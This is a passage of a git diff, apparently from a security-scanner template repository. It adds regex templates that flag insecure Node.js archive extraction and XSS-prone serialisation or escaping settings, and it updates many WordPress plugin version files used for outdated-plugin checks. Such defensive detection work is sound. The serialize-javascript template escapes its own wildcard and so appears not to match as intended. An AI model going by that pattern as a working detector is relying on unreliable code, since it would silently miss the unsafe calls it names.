condition: or diff --git a/file/nodejs/tar-path-overwrite.yaml b/file/nodejs/tar-path-overwrite.yaml new file mode 100644 index 0000000000..241491c97c --- /dev/null +++ b/file/nodejs/tar-path-overwrite.yaml @@ -0,0 +1,21 @@ +id: tar-path-overwrite + +info: + name: Tar Path Overwrite + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Insecure TAR archive extraction can result in arbitrary path over write and can result in code injection. + tags: file,nodejs + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "require\\('tar-stream'\\)" + - "[\\w\\W]+?\\.createWriteStream\\([\\w\\W]*?\\, [\\w\\W]*?\\)" + - "[\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\, [\\w\\W]*?\\)" + - "[\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\, [\\w\\W]*?\\)" + condition: or diff --git a/file/nodejs/xss-disable-mustache-escape.YAML b/file/nodejs/xss-disable-mustache-escape.YAML new file mode 100644 index 0000000000..8d8918dbb8 --- /dev/null +++ b/file/nodejs/xss-disable-mustache-escape.YAML @@ -0,0 +1,17 @@ +id: xss-disable-mustache-escape + +info: + name: XSS Disable Mustache Escape + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Markup escaping disabled. This can be used with some template engines to escape disabling of HTML entities, which can lead to XSS attacks. + tags: file,nodejs,mustache,xss + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "[\\w\\W]+?\\.escapeMarkup = false" diff --git a/file/nodejs/xss-serialize-javascript.yaml b/file/nodejs/xss-serialize-javascript.yaml new file mode 100644 index 0000000000..011b11c797 --- /dev/null +++ b/file/nodejs/xss-serialize-javascript.yaml @@ -0,0 +1,26 @@ +id: xss-serialize-javascript + +info: + name: XSS Serialize Javascript + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Untrusted user input reaching `serialize-javascript` with `unsafe` attribute can cause Cross Site Scripting (XSS). + tags: file,nodejs,serialize,xss + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "require\\('serialize-javascript'\\)" + - "\\$S\\(\\.\\*?, \\{unsafe: true\\}\\)" + condition: or + + - type: regex + negative: true + regex: + - "escape\\(.*?\\)" + - "encodeURI\\(.*?\\)" + condition: or diff --git a/file/nodejs/zip-path-overwrite.yaml b/file/nodejs/zip-path-overwrite.yaml new file mode 100644 index 0000000000..6feb0c66d4 --- /dev/null +++ b/file/nodejs/zip-path-overwrite.yaml @@ -0,0 +1,28 @@ +id: zip-path-overwrite + +info: + name: Zip Path Overwrite + author: me_dheeraj (https://twitter.com/Dheerajmadhukar) + severity: info + description: Insecure ZIP archive extraction can result in arbitrary path overwrite and can result in code injection. + tags: file,nodejs + +file: + - extensions: + - all + + matchers: + - type: regex + regex: + - "require\\('unzip'\\)" + - "require\\('unzipper'\\)" + - "[\\w\\W]+?\\.pipe\\([\\w\\W]+?\\.Parse\\([\\w\\W]*?\\)\\)\\.on\\('entry', function [\\w\\W]*?\\([\\w\\W]*?\\) \\{" + - "[\\w\\W]+? = [\\w\\W]+?\\.indexOf\\([\\w\\W]*?\\)" + - "[\\w\\W]+?\\.pipe\\([\\w\\W]+?\\.createWriteStream\\([\\w\\W]*?\\)\\)" + - "[\\w\\W]+?\\.pipe\\([\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\)\\)" + - "[\\w\\W]+?\\.pipe\\([\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\)\\)" + - "[\\w\\W]+?\\.Parse\\([\\w\\W]*?\\)\\.on\\('entry', function [\\w\\W]*?\\([\\w\\W]*?\\) \\{" + - "[\\w\\W]+?\\.createWriteStream\\([\\w\\W]*?\\)" + - "[\\w\\W]+?\\.writeFile\\([\\w\\W]*?\\)" + - "[\\w\\W]+?\\.writeFileSync\\([\\w\\W]*?\\)" + condition: or diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt index c1014e0e2d..64a0fd97bd 100644 --- a/helpers/wordpress/plugins/ad-inserter.txt +++ b/helpers/wordpress/plugins/ad-inserter.txt @@ -1 +1 @@ -2.7.28 \ No newline at end of file +2.7.29 \ No newline at end of file diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index 3af67b5cb5..cb6b1ffdc8 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.1.6 \ No newline at end of file +6.1.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/akismet.txt b/helpers/wordpress/plugins/akismet.txt index 83364075e0..341d0b550f 100644 --- a/helpers/wordpress/plugins/akismet.txt +++ b/helpers/wordpress/plugins/akismet.txt @@ -1 +1 @@ -5.1 \ No newline at end of file +5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index 738a7f03f6..da3a40311f 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.3.8 \ No newline at end of file +4.4.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index c69a5e237b..d63eb35c4b 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.75 \ No newline at end of file +7.76 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index 06eda28ac7..c4a602db6e 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.2.3 \ No newline at end of file +3.2.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt index d40b13a3fb..301a9a951c 100644 --- a/helpers/wordpress/plugins/autoptimize.txt +++ b/helpers/wordpress/plugins/autoptimize.txt @@ -1 +1 @@ -3.1.7 \ No newline at end of file +3.1.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breeze.txt b/helpers/wordpress/plugins/breeze.txt new file mode 100644 index 0000000000..46d9844b78 --- /dev/null +++ b/helpers/wordpress/plugins/breeze.txt @@ -0,0 +1 @@ +2.0.26 \ No newline at end of file diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index 50aea0e7ab..e3a4f19336 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index e93307f558..21463eaa41 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.28 \ No newline at end of file +3.29 \ No newline at end of file diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index 282895a8f8..b38ebbfce2 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -3.0.3 \ No newline at end of file +3.0.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt index fbcbf73806..8cf6caf561 100644 --- a/helpers/wordpress/plugins/code-snippets.txt +++ b/helpers/wordpress/plugins/code-snippets.txt @@ -1 +1 @@ -3.4.0 \ No newline at end of file +3.4.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index b5edd8ee84..d4563d9c5d 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.4.6 \ No newline at end of file +6.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 489200c52b..50e47c89ca 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.0.9 \ No newline at end of file +3.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-notice.txt b/helpers/wordpress/plugins/cookie-notice.txt index 752a79ef36..158349812d 100644 --- a/helpers/wordpress/plugins/cookie-notice.txt +++ b/helpers/wordpress/plugins/cookie-notice.txt @@ -1 +1 @@ -2.4.8 \ No newline at end of file +2.4.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-css-js.txt b/helpers/wordpress/plugins/custom-css-js.txt index 2f14627109..ce8ae45f1a 100644 --- a/helpers/wordpress/plugins/custom-css-js.txt +++ b/helpers/wordpress/plugins/custom-css-js.txt @@ -1 +1 @@ -3.43 \ No newline at end of file +3.44 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt index 8ed486ab78..10bf840ed5 100644 --- a/helpers/wordpress/plugins/custom-fonts.txt +++ b/helpers/wordpress/plugins/custom-fonts.txt @@ -1 +1 @@ -1.3.7 \ No newline at end of file +2.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-comments.txt b/helpers/wordpress/plugins/disable-comments.txt index 6550da6970..ab6d27898c 100644 --- a/helpers/wordpress/plugins/disable-comments.txt +++ b/helpers/wordpress/plugins/disable-comments.txt @@ -1 +1 @@ -2.4.3 \ No newline at end of file +2.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt index 63ebd3fe34..5ebba4f08a 100644 --- a/helpers/wordpress/plugins/duplicator.txt +++ b/helpers/wordpress/plugins/duplicator.txt @@ -1 +1 @@ -1.5.4 \ No newline at end of file +1.5.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 82dc52c3c0..5d737ca0ed 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.13.4 \ No newline at end of file +3.14.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index 4b1e48ed97..edb1d397cf 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.7.4 \ No newline at end of file +5.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt index 73a86b1970..3769235d3e 100644 --- a/helpers/wordpress/plugins/ewww-image-optimizer.txt +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -1 +1 @@ -7.0.1 \ No newline at end of file +7.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 1290e203c3..38be3a7bcd 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.23 \ No newline at end of file +3.0.26 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fast-indexing-api.txt b/helpers/wordpress/plugins/fast-indexing-api.txt new file mode 100644 index 0000000000..95ce23d450 --- /dev/null +++ b/helpers/wordpress/plugins/fast-indexing-api.txt @@ -0,0 +1 @@ +1.1.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index 97915771a4..4d5e5283b9 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -4.3.25 \ No newline at end of file +5.0.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index 39ee137ba5..f9da12e118 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.3.1 \ No newline at end of file +6.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index b544c09974..3e940eb724 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.23.3 \ No newline at end of file +1.24.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt index ea64bf6897..912ed65801 100644 --- a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt +++ b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt @@ -1 +1 @@ -4.12.2 \ No newline at end of file +4.12.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt index 9d8d566b5b..261655b0c9 100644 --- a/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt +++ b/helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt @@ -1 +1 @@ -7.15.3 \ No newline at end of file +7.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt index d9316e8b91..19a7efe84f 100644 --- a/helpers/wordpress/plugins/google-analytics-for-wordpress.txt +++ b/helpers/wordpress/plugins/google-analytics-for-wordpress.txt @@ -1 +1 @@ -8.15 \ No newline at end of file +8.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 62e64205bf..a6c4b4a24a 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.4.6 \ No newline at end of file +2.4.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index f2575d200b..be40cc4567 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.101.0 \ No newline at end of file +1.103.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index c74a170d6d..11155dbeea 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -15.9.1 \ No newline at end of file +16.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-code-manager.txt b/helpers/wordpress/plugins/header-footer-code-manager.txt index 6dbd15a0b6..9b51125a6c 100644 --- a/helpers/wordpress/plugins/header-footer-code-manager.txt +++ b/helpers/wordpress/plugins/header-footer-code-manager.txt @@ -1 +1 @@ -1.1.32 \ No newline at end of file +1.1.34 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index 29fe95d7a3..4cc0e35cb3 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.5.6 \ No newline at end of file +5.6.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt index 3bad7881d2..476ede462b 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.0.12 \ No newline at end of file +2.0.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/iwp-client.txt b/helpers/wordpress/plugins/iwp-client.txt index f577dfda01..6f165bc1b0 100644 --- a/helpers/wordpress/plugins/iwp-client.txt +++ b/helpers/wordpress/plugins/iwp-client.txt @@ -1 +1 @@ -trunk \ No newline at end of file +1.12.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index 91c7810d66..e597143d87 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -12.1.1 \ No newline at end of file +12.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 3a460e657f..a254f0ac2c 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.0.40 \ No newline at end of file +3.0.41 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kirki.txt b/helpers/wordpress/plugins/kirki.txt index 2582dddfd5..ef8d7569d6 100644 --- a/helpers/wordpress/plugins/kirki.txt +++ b/helpers/wordpress/plugins/kirki.txt @@ -1 +1 @@ -4.1.1 \ No newline at end of file +4.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt index 9bddc4a599..e02c07f215 100644 --- a/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt +++ b/helpers/wordpress/plugins/limit-login-attempts-reloaded.txt @@ -1 +1 @@ -2.25.18 \ No newline at end of file +2.25.20 \ No newline at end of file diff --git a/helpers/wordpress/plugins/litespeed-cache.txt b/helpers/wordpress/plugins/litespeed-cache.txt index 48c32b26a1..e5e7441d3e 100644 --- a/helpers/wordpress/plugins/litespeed-cache.txt +++ b/helpers/wordpress/plugins/litespeed-cache.txt @@ -1 +1 @@ -5.4 \ No newline at end of file +5.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginpress.txt b/helpers/wordpress/plugins/loginpress.txt index 081af9a10f..afa2b3515e 100644 --- a/helpers/wordpress/plugins/loginpress.txt +++ b/helpers/wordpress/plugins/loginpress.txt @@ -1 +1 @@ -1.7.1 \ No newline at end of file +1.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailchimp-for-wp.txt b/helpers/wordpress/plugins/mailchimp-for-wp.txt index f4cfd30c45..efd4ffcab8 100644 --- a/helpers/wordpress/plugins/mailchimp-for-wp.txt +++ b/helpers/wordpress/plugins/mailchimp-for-wp.txt @@ -1 +1 @@ -4.9.4 \ No newline at end of file +4.9.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index 331b258ffe..a7752bacf1 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.17.1 \ No newline at end of file +4.20.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mainwp-child.txt b/helpers/wordpress/plugins/mainwp-child.txt index af964728ff..1c3d5b4c23 100644 --- a/helpers/wordpress/plugins/mainwp-child.txt +++ b/helpers/wordpress/plugins/mainwp-child.txt @@ -1 +1 @@ -4.4.1.1 \ No newline at end of file +4.4.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index 262122f679..23900d674d 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.7.1 \ No newline at end of file +5.7.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ml-slider.txt b/helpers/wordpress/plugins/ml-slider.txt index fdb94d0326..40fc72677c 100644 --- a/helpers/wordpress/plugins/ml-slider.txt +++ b/helpers/wordpress/plugins/ml-slider.txt @@ -1 +1 @@ -3.31.0 \ No newline at end of file +3.32.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index d21b198c83..b3956576d7 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -7.7.0 \ No newline at end of file +7.8.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt index dd9db9fc5d..7d8ebf9eef 100644 --- a/helpers/wordpress/plugins/nextend-facebook-connect.txt +++ b/helpers/wordpress/plugins/nextend-facebook-connect.txt @@ -1 +1 @@ -3.1.8 \ No newline at end of file +3.1.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 6de80413b7..47b080dc85 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.6.24 \ No newline at end of file +3.6.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/official-facebook-pixel.txt b/helpers/wordpress/plugins/official-facebook-pixel.txt index e4a0720dd5..d003324bf6 100644 --- a/helpers/wordpress/plugins/official-facebook-pixel.txt +++ b/helpers/wordpress/plugins/official-facebook-pixel.txt @@ -1 +1 @@ -3.0.11 \ No newline at end of file +3.0.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index d1cdec8ed6..3a36fc04c0 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.13.2 \ No newline at end of file +2.13.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 2b3e713313..8824b7e7f5 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.3.7 \ No newline at end of file +9.3.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/polylang.txt b/helpers/wordpress/plugins/polylang.txt index a423d4217b..8a0feb98ca 100644 --- a/helpers/wordpress/plugins/polylang.txt +++ b/helpers/wordpress/plugins/polylang.txt @@ -1 +1 @@ -3.4.2 \ No newline at end of file +3.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index 160fe391c8..6de6d05565 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.5.5 \ No newline at end of file +2.5.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-types-order.txt b/helpers/wordpress/plugins/post-types-order.txt index b9d2bdfd65..ed35d09262 100644 --- a/helpers/wordpress/plugins/post-types-order.txt +++ b/helpers/wordpress/plugins/post-types-order.txt @@ -1 +1 @@ -2.0.5 \ No newline at end of file +2.0.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 6206eaf15b..58426c1034 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.9.57 \ No newline at end of file +4.10.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/really-simple-ssl.txt b/helpers/wordpress/plugins/really-simple-ssl.txt index 5febf2603f..c60ebc1807 100644 --- a/helpers/wordpress/plugins/really-simple-ssl.txt +++ b/helpers/wordpress/plugins/really-simple-ssl.txt @@ -1 +1 @@ -7.0.3 \ No newline at end of file +7.0.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/redux-framework.txt b/helpers/wordpress/plugins/redux-framework.txt index 4f3470c166..f0f76fb693 100644 --- a/helpers/wordpress/plugins/redux-framework.txt +++ b/helpers/wordpress/plugins/redux-framework.txt @@ -1 +1 @@ -4.4.1 \ No newline at end of file +4.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 1b935bb17e..6cf4d627b1 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.116 \ No newline at end of file +1.0.118 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index 34a8f745d4..c6db724bfd 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.3.1 \ No newline at end of file +7.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt index fff6bf312b..e230c8396d 100644 --- a/helpers/wordpress/plugins/shortpixel-image-optimiser.txt +++ b/helpers/wordpress/plugins/shortpixel-image-optimiser.txt @@ -1 +1 @@ -5.2.3 \ No newline at end of file +5.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt index da266122d4..f8f895c6aa 100644 --- a/helpers/wordpress/plugins/siteorigin-panels.txt +++ b/helpers/wordpress/plugins/siteorigin-panels.txt @@ -1 +1 @@ -2.23.0 \ No newline at end of file +2.24.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/smart-slider-3.txt b/helpers/wordpress/plugins/smart-slider-3.txt index 55be1ba6f0..7858b9c11e 100644 --- a/helpers/wordpress/plugins/smart-slider-3.txt +++ b/helpers/wordpress/plugins/smart-slider-3.txt @@ -1 +1 @@ -3.5.1.16 \ No newline at end of file +3.5.1.17 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index ce92a2d3c1..daf515c92d 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.50.0 \ No newline at end of file +1.50.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index abae0d9a94..c346e7a049 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.1.3 \ No newline at end of file +2.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index 556e2e1df6..9734e120ae 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.0.13.1 \ No newline at end of file +6.1.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/translatepress-multilingual.txt b/helpers/wordpress/plugins/translatepress-multilingual.txt index d21aa93ccd..1b03fe63dd 100644 --- a/helpers/wordpress/plugins/translatepress-multilingual.txt +++ b/helpers/wordpress/plugins/translatepress-multilingual.txt @@ -1 +1 @@ -2.5.4 \ No newline at end of file +2.5.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt index e46a05b196..e0e1b4687c 100644 --- a/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt +++ b/helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt @@ -1 +1 @@ -2.6.4 \ No newline at end of file +2.6.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/updraftplus.txt b/helpers/wordpress/plugins/updraftplus.txt index 8cb07451db..fa994bd719 100644 --- a/helpers/wordpress/plugins/updraftplus.txt +++ b/helpers/wordpress/plugins/updraftplus.txt @@ -1 +1 @@ -1.23.4 \ No newline at end of file +1.23.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/w3-total-cache.txt b/helpers/wordpress/plugins/w3-total-cache.txt index e7034819f6..45674f16a8 100644 --- a/helpers/wordpress/plugins/w3-total-cache.txt +++ b/helpers/wordpress/plugins/w3-total-cache.txt @@ -1 +1 @@ -2.3.2 \ No newline at end of file +2.3.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index 0bfbd57387..abb1658232 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -1.8.2 \ No newline at end of file +1.9.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index cf51361190..132c6def58 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -5.9.0 \ No newline at end of file +6.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index b9d2bdfd65..50aea0e7ab 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.0.5 \ No newline at end of file +2.1.0 \ No newline at end of file diff --git 